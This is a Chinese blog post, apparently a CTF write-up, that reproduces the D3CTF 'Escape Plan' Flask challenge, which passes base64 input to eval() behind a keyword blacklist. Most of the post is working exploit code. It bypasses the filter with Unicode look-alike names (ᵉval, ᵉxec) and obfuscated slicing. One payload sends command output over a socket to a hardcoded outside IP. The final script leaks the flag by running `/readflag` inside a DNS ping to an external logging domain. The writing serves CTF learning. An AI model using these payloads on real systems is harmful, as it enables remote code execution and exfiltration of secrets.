ctf web复现

已于 2023-05-07 10:18:08 修改
阅读量735 收藏 1
点赞数 1
分类专栏: CTF 文章标签: 前端 flask python
于 2023-05-07 09:48:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64815693/article/details/130538734
版权

D3CTF-WEB

Escape Plan

import base64

from flask import Flask, request

app = Flask(__name__)

@app.route('/', methods=['GET', 'POST'])
def challenge_3():
    cmd = request.form.get("cmd", "")
    if not cmd:
        return """<pre>
import requests, base64
exp = ''
requests.post("", data={"cmd": base64.b64encode(exp.encode())}).text
</pre>
"""

    try:
        cmd = base64.b64decode(cmd).decode()
    except Exception:
        return "bad base64"

    black_char = [
        "'", '"', '.', ',', ' ', '+',
        '__', 'exec', 'eval', 'str', 'import',
        'except', 'if', 'for', 'while', 'pass',
        'with', 'assert', 'break', 'class', 'raise',
        '0', '1', '2', '3', '4', '5', '6', '7', '8', '9',
    ]
    for char in black_char:
        if char in cmd:
            return f'failed: `{char}`'

    msg = "success"
    try:
        eval(cmd)
    except Exception:
        msg = "error"

    return msg

他给了app.py的源码,我们分析分析。

  • 定义了一个名为 challenge_3 的函数,可以接收get和post的请求
  • 首先从请求的表单数据中获取名为 "cmd" 的值。如果没有找到 "cmd",则返回一个代码使用 requests 库发送 POST 请求并将 "cmd" 参数编码为 base64。
  • 如果找到了 "cmd",则尝试对其进行 base64 解码。如果解码失败,返回 "bad base64"。
  • 遍历 black_char 列表,检查 "cmd" 是否包含任何不允许的字符,就是黑名单。

Python 沙箱逃逸的通解探索之路 | CN-SEC 中文网

这里面最后一个给了我们一个payload,通过对比发现只用绕过eval,我们可以使用ᵉval来代替eval,我们先本地测试一下

import base64

u = '𝟢𝟣𝟤𝟥𝟦𝟧𝟨𝟩𝟪𝟫'
# a = b'''__import__('os').popen('python -c "import socket, os; flag = os.popen(\\"whoami\\").read().encode();host = \\"120.48.123.181\\";port=7777;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((host, port));s.sendall(flag);s.close();a=1;"').read()'''
a = base64.b64encode(b"__import__('os').popen('whoami').read()").decode()
a += "="
CMD = "eval(vars(eval(list(dict(_a_aiamapaoarata_a_=()))[len([])][::len(list(dict(aa=()))[len([])])])(list(dict(b_i_n_a_s_c_i_i_=()))[len([])][::len(list(dict(aa=()))[len([])])]))[list(dict(a_2_b1_1b_a_s_e_6_4=()))[len([])][::len(list(dict(aa=()))[len([])])]](list(dict({}()))[len([])]))".format(a)
CMD = CMD.translate({ord(str(i)): u[i] for i in range(10)})
base = CMD.replace("eval","ᵉval")
cmd = base64.b64encode(base.encode())

try:
    cmd = base64.b64decode(cmd).decode()
except Exception:
    print("bad base64")
black_char = [
    "'", '"', '.', ',', ' ', '+',
    '__', 'exec', 'eval', 'str', 'import',
    'except', 'if', 'for', 'while', 'pass',
    'with', 'assert', 'break', 'class', 'raise',
    '0', '1', '2', '3', '4', '5', '6', '7', '8', '9',
]
for char in black_char:
    if char in cmd:
        print(f'failed: `{char}`')
try:
    print(eval(cmd))
except Exception:
    print("error")

这里我原本尝试了很多种方法,结果发现都是error,到最后发现是python base64模块缘故,导致解析错误,他需要补一个等号才可以,但是尝试其他的方法有不行了

然后看到这里发现又有别的方法Docs,利用数组切片进行截取

import requests
import base64
shell='ping -c 1 `/readflag`.c17fafb7.dns.dnsmap.org'
s=''
for i in shell:
    s+="chr("+str(ord(i))+")+"
print(s[0:-1])
payload = payload = "__import__('os').popen({})".format(s[0:-1])
payload1 = "ᵉxec(repr(request)[(len(black_char[len([])])<<(len(black_char[len([])])))|(len(black_char[len([])])<<(len(black_char[len([])])<<len(black_char[len([])])))|(len(black_char[len([])])<<(len(black_char[len([])])<<len(black_char[len([])])<<len(black_char[len([])])|len(black_char[len([])]))):len(repr(request))-int(black_char[len(black_char)-len(black_char[len([])])])])"
data = {"cmd": base64.b64encode(payload1.encode('utf-8')).decode('utf-8')}
url='http://47.102.115.18:30634/?'+payload
response=requests.post(url=url,data=data)
print(response.text)

这里我们分析一下这个切片

  • repr(request):返回一个表示 request 对象的字符串。
  • 然后这个request对象是Flask自动传递的,应该就是我们通过get传输进来的值
  • repr(request)[值1:值2] ,这个应该获得上面请求中那一部分可以执行的,最后传入eval中

这里我们本地看一看

他最后获得的应该就是这些,然后进行执行通过ping DNS将flag带出来 

练习两年半的篮球选..哦不对安全选手
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctf-web
weixin_43150428的博客
11-04 2664
ctf-web 信息搜集 认证绕过 SQL注入 文件上传 文件包含 PHP代码审计 信息搜集 源码泄露 页面源代码 敏感文件泄漏 备份文件(.swp/.bak/.beifen/~/phps等) [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MGonEuLW-1604453612546)(https://i.loli.net/2020/11/02/kUboAxLhtRvD85z.png)] 数据库(mdb) 压缩包(zip/tar.gz//DS_Stor
CTFHUB——RCE之eval执行和文件包含漏洞
m0_46467017的博客
08-31 5254
代码解释:本关代码和第一关文件包含一样,通过strpos函数判断参数是否存在flag字符,存在就执行include函数。因为本关没有限制php://input伪协议,所以本关解法和上一关一样,这里就不再赘述了。代码解释:本关代码和之前php://input关卡一样,通过substr函数来判断file参数是否等于php://,如果等于就执行include函数。代码解释为如果存在cmd参数,那就用eval函数执行cmd参数中的代码,所以本关存在命令执行。连接成功后,其余步骤与上一关相同。...
ctfWEB练习二
渗透测试研究中心
12-15 8619
题目名称:从0到1CTFer成长之路-Web文件上传题目wirteup:启动题目场景,获得题目靶场,访问网站,发现是一个文件上传漏洞,并且源代码也显示出来。http://eci-2zead4wngyl8hacgmm4n.cloudeci1.ichunqiu.com/ 源代码大概如下分析:<?phpheader("Content-Type:text/html; charset=utf-8")...
CTF】buuctf web 详解(持续更新)
热门推荐
m0_52923241的博客
08-12 3万+
buuctf web[HCTF 2018]WarmUp[极客大挑战 2019]EasySQL[极客大挑战 2019]Havefun[强网杯 2019]随便注[ACTF2020 新生赛]Include[SUCTF 2019]EasySQL[极客大挑战 2019]Secret File[ACTF2020 新生赛]Exec[极客大挑战 2019]LoveSQL[GXYCTF2019]Ping Ping Ping[极客大挑战 2019]Knife[极客大挑战 2019]Http[RoarCTF 2019]Easy
[CTF]SCTF2021 WEB复现(详细版)
Sapphire037的博客
01-09 4248
Loginme 下载附件得到源码,题目让我们本地访问,也就是要伪造ip,但是是有检测的,源码: package middleware import ( "github.com/gin-gonic/gin" ) func LocalRequired() gin.HandlerFunc { return func(c *gin.Context) { if c.GetHeader("x-forwarded-for") != "" || c.GetHeader("x-client-ip") != ""
b01lers CTF web 复现
shinygod的博客
03-21 829
这题考的是 `xss` 中的表单劫持,和一点点 `csp` 的绕过。 在页面中可以看到 `default-src 'none';` 以及一些其他的限制,可以用 `meta` 标签来进行 `url` 重定向。 例如:这里面的 1 是延迟 1 秒后跳转。
XYCTF部分web题目复现
最新发布
05-06
XYCTF部分web题目复现
CTF_Web_docker:CTF_Web的码头工人
05-14
CTF_Web_dockerCTFWeb和Bin最大的区别在于,一旦比赛结束,Web选手就抓瞎了,没办法复现EXP。因此,打算收集整理一些自己做的Web题环境,方便复现。Enjoy it.
D3CTF2022-官方WriteUp1
08-03
本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User-Defined Functions(UDF)...
Web-CTF-挑战:收集代码古怪的行为以及我围绕它们提出的CTF挑战
02-05
"Web-CTF-挑战:收集代码古怪的行为以及我围绕它们提出的CTF挑战"是一个专注于Web开发和安全的系列挑战,通过分析和解决古怪的代码问题来锻炼参与者的技能。这个挑战集主要涉及Node.js、Express.js和HandleBars这三...
CTF撰写
02-09
CTF比赛的Web安全部分,PHP是经常出现的关键技术。PHP是一种广泛使用的服务器端脚本语言,尤其在Web开发中占有重要地位。因此,理解PHP的基本语法、函数和常见漏洞是解决这类问题的基础。例如,文件包含漏洞(File...
SECCON CTF 2022 web复现
shinygod的博客
11-20 783
SECCON CTF 2022 web复现
[2022 ACTF]web题目复现
cosmoslin的博客
07-06 1600
查看dockerfile发现题目使用环境为goahead5.1.4,联想到p神对于该漏洞的复现记录,我们有两种方法解题:GoAhead环境变量注入复现踩坑记hack.c 编译 exp.py exp.py 简单看一下代码逻辑:server.js 整个题目通过websockets通信,当api为getflag时传入flagbot 这里发现admin登录没有任何限制,那么我们登录admin再传入getflag即可 原型链污染: xss: ToLeSion 考点: TLS-Poison 一篇文章带你读懂 TLS
[vsCTF2022]web题目复现
cosmoslin的博客
07-13 772
nodejs的eval命令执行,过滤了很多,利用 vsCAPTCHA 进入页面需要我们输入验证码根据图示:我们需要在每一轮也就是10s内正确输入验证码,总共输入正确1000次,验证码结果为两数相加抓包发现字段,是一段jwt,解码看一下猜测字段含义:第一种思路是将令牌中numCaptchasSolved的值更改为 1000,然后发送它来欺骗服务器,使其认为已经验证了1000次。但是,JWT 是经过签名的,尝试之后发现现有方法都不行,因此必须找到另一种方法。另一种思路是使用 OCR 来检索验证码的内容,但在如此
VNCTF2022 web复现
Pysnow's Blog
04-07 2896
web 文章目录webGameV4.0gocalc0easyJ4va信息收集获取key反序列化newcalc0非预期PoC 1PoC 2预期解InterestingPHP解法一解法二 GameV4.0 前端小游戏题,直接想到查看js源代码 在data.js文件中搜索到了关键词flag,且后面附着着一个base64编码的字符串,解码试试 得到flag,再将其url解码一下就行 VNCTF{Welcome_to_VNCTF2022} gocalc0 go语言的ssti,传入{{.}}指向当前的类,类似于
Request.Form的用法
weixin_33830216的博客
03-18 1414
在CS文件中获得对应页面中的下拉框DropDownList_sitebranch值可以有以下几种方法获得:        siteInfo.FZJGID = DropDownList_sitebranch.SelectedItem.Value.Trim();        siteInfo.FZJGID = Request.Form["DropDownList_sitebranch"].ToS...
MRCTF web部分复现wp
xlcvv的博客
04-05 697
一、ez_bypass 换个界面- 这个有点丑: GET两个参数:gg 和 id,md5值相同但本值不同,md5碰撞,之前有做过:,但是试了一些值都不行? 那就传入的为数组,md5()函数无法处理数组,如果传入数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。 显示出了You got the first steponly one way to get the fl...
CTFhubweb技能树复现
qidiandexiaowu
10-25 365
信息泄露0×00 目录遍历0×01 PHPINFO0×02 备份文件下载0×01 网站源码0×02 bak文件0×03 vim缓存0×04.DS_Store0×03 Git泄露0×00 Log0×01 Stash0×02 index0×04 SVN泄露0×05 HG泄露 0×00 目录遍历 这个以前也讲过。 拿到环境 这次是给你了,如果不给你还需要使用工具扫描。 在3文件夹内找到了flag。 0×01 PHPINFO 就是得到PHP版本的信息。 在众多的信息里,寻找到你想要的。 0×02 备份文件下载
[SCUCTF]2021 校赛 Web题目复现
cosmoslin的博客
04-08 1985
web 1 入门 查看headers 2 shell <?php if(isset($_GET['eval'])){ $eval = $_GET['eval']; if(!preg_match('/[0-9]|[a-z]|\^|\+|\||\$|\[|\]|\{|\}|\&|\-/i', $c)){ eval("$eval"); }else{ die("hacker??"); } }else{ highlight_file(__FILE__); } ?
ctf web 思维导图
12-18
CTF(Capture The Flag)是一种网络安全竞赛,其中的Web领域涉及到了网页应用程序的漏洞挖掘和利用。下面是CTF Web思维导图的简要解释: CTF Web思维导图主要分为三个方面:Web漏洞类型、漏洞利用技术和解题方法。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

练习两年半的篮球选..哦不对安全选手

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值